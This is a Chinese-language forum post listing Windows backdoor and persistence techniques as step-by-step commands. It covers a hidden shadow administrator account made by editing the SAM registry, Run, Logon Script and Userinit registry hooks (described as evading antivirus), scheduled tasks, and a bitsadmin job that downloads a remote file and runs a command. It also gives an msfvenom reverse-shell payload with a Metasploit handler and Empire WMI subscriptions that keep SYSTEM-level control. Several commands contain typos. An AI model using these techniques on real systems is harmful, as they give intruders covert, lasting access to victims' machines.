羊蹓狼 发表于 2022-9-26 19:09:40

windows操作系统后门


[*]影子账户
[*]  创建隐藏账户的方式:
[*]创建一个隐藏账户"net user test$ password /add",隐藏账户无法使用"net user"命令查看,但是可以在"本地用户和组"里面查看。
[*]打开注册表"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names"找到创建的隐藏账户(test$),在这个注册表里面可以看见test$账户的类型,同样可以查看计算机Administrator账户的类型
[*]回退注册表"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names"到上一级"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/",找到Administrator对应目录000001FA,双击"F"复制里面的值,然后找到test$账户对应的目录000003EC,双击"F"后把刚才复制的值粘贴进去,
[*]在注册表中导出"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names"下的test$和"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/"下的000003EC,然后在命令行中运行命令"net user test$ /del"删除test$用户。
[*]导入上一步导出的两个注册表文件,就可以创建影子账户test$,该账户只有在注册表中才能看到。


[*]注册表后门
[*]  Run注册表后门
[*]HKEY_LOCAL_MACHINE\SOFTWARE|Microsoft\Windows\CurrentVersion\Run下的键值即为开机启动项,每一次开机都会执行对应的程序或bat脚本。

[*]  Logon Scripts后门
[*]Logon Scripts是优先于很多杀毒软件启动的,所以可以通过这种方式达到一定的免杀效果,HKEY_CURRENT_USER/Enviroment下新建字符串值UserInitMprLogonScript,值设为想要执行的程序或bat脚本的路径,修改后注销重新登录后执行脚本。

[*]  Userinit注册表后门
[*]Userinit的作用是用户在进行登录初始化的设置时,会执行指定的程序,可以修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\winlogon\Userinit的键值来添加要执行的程序,多个程序用逗号隔开,注销登录后执行。


[*]计划任务后门
[*]  windows实现定时任务主要有schtasks与at两种方式,均可用于计划在某个日期和时间执行程序和脚本,其中at命令在win8之后不在支持。
[*]schtasks命令,创建一个名为test的计划任务每天12:00执行test.bat脚本。(schtasks /creat /tn test /sc DAILY /st 12:00 /tr C:\test.bat /F)
[*]at命令,创建一个周一到周五12:00执行的test.bat的计划任务,(at 12:00/every:Monday,Tuesday,Wednesday,Thursday,Firday c:\test.bat)


[*]Bitsadmin后门
[*]  Bitsadmin后台智能传输服务,是一个windows组件,从win7之后操作系统默认自带,它可以利用空闲的带宽在前台或后台异步传输文件,并支持在重新启动计算机或重新连接网络后自动回复文件传输,常用于WindowsUpdate的安装更新,攻击者可以利用它的特性在被控制的计算机上面持久运行。
[*]bitsadmin /creat DisplayName 创建一个任务
[*]bitsadmin /cancel删除一个任务
[*]ditsadmin /complete完成某个任务
[*]ditsadmin /Resume激活传输队列中的新任务或挂起的任务
[*]bitsadmin /list /allusers /verbase 列出所有任务
[*]bitsadmin /reset /allusers 删除所有任务
[*]bitsadmin /Addfile    给任务添加下载文件
[*]bitsadmin /SetNotifyCmdLine    设置在任务完成传输

[*]       bitsadmin 后门创建
[*]创建任务名为:test
[*]bitsadmin /create test

[*]远程文件下载到本地
[*]bitsadmin /addfile test http://ip/test.txt "c:\test.txt"

[*]文件下载完成执行命令
[*]bitsadmin /SetNotifyCmdLine test "%COMSPEC%" "cmd.exe /c calc.exe"

[*]执行任务
[*]bitsadmin /resume test

[*]完成任务
[*]bitsadmin /complete test

[*]如果没有执行"bitsadmin /complete test"命令,即使重启系统任务依然存在,重启后等待几秒后还会执行。


[*]MSF后门模块
[*]  MSF留后门的两种方式:
[*]Metsvc:通过服务启动,会在目标主机上以Meterpreter的服务的形式注册在服务列表中,并开机自动启动。
[*]Persistence:通过启动项启动,在目标机器上以反弹回连方式来连接服务器。

[*]  首先获取Meterpreter shell,使用Msfvenom生成反弹shell 木马,然后在目标机器上执行木马程序后去shell。
[*]msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=1234 -f exe >/tmp/shell.exe
[*]msf6>use exploit/multi/handler
[*]msf6>set payload windows/metsvc_bind_tcp 
[*]msf6>set lport 31337
[*]msf6>set rhost 192.168.1.103
[*]msf6>run


[*]WMI型后门
[*]  wmic startup list full 自启动的程序
[*]  wmic process call create "calc.exe" 在当前机器中执行指定程序
[*]  wmic process where(description="rundll32.exe")查看rundll32所加载的dll
[*]       wmic cpu get DataWidth /format:list 查询当前机器的操作系统位数
[*]       WMI的事件分两类:
[*]本地事件:有生命周期,为进程宿主的周期
[*]永久性WMI事件订阅:存储在WMI库中,以SYSTEM权限运行,并且重启后依然存在
[*]使用Empire的wmi模块之前,需要使用Empire获取目标主机shell,使用Empire创建名为test的监听并生成powershell代码
[*]在目标主机上执行powershell代码之后,在agents功能模块下可以看到上线的主机。
[*]使用powershell/persistence/elevated/wmi模块来创建一个永久的WMI订阅,能够持久化控制目标主机
[*]在目标主机创建了永久订阅后,即使重启也会重新获取目标主机的权限。并且是SYSTEM权限



免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页: [1]
查看完整版本: windows操作系统后门